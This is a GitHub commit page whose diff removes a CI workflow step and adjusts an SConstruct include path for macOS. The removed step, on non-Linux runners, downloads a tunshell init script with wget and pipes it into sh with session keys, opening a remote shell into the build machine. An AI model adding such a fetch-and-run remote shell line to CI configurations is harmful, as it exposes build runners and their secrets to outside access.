Skip to content

Commit 918d09f

Browse files
committed
🐴👀don't look a gift horse in the mouth 🦷✨
1 parent 9e04607 commit 918d09f

File tree

2 files changed

+3
-5
lines changed

2 files changed

+3
-5
lines changed

.github/workflows/tests.yml

+1-4
Original file line numberDiff line numberDiff line change
@@ -17,7 +17,4 @@ jobs:
1717
steps:
1818
- uses: commaai/timeout@v1
1919
- uses: actions/checkout@v4
20-
- run: |
21-
[[ $OSTYPE = "linux-gnu" ]] && ./test.sh || {
22-
wget https://lets.tunshell.com/init.sh -O - 2> /dev/null | sh -s -- T TGkfkkGS9f4tuWs0SbIJrh EPE96yezV0V28uuiSANRRw
23-
}
20+
- run: ./test.sh

SConstruct

+2-1
Original file line numberDiff line numberDiff line change
@@ -13,10 +13,11 @@ os.environ['PYTHONPATH'] = str(Path(sysconfig.get_paths()['data']).parent)
1313
python_path = sysconfig.get_paths()['include']
1414
cpppath = [
1515
'#',
16-
'#third_party',
1716
'/usr/lib/include',
1817
python_path
1918
]
19+
if arch == "Darwin":
20+
cpppath.append('#third_party')
2021

2122
AddOption('--minimal',
2223
action='store_false',

0 commit comments

Comments
 (0)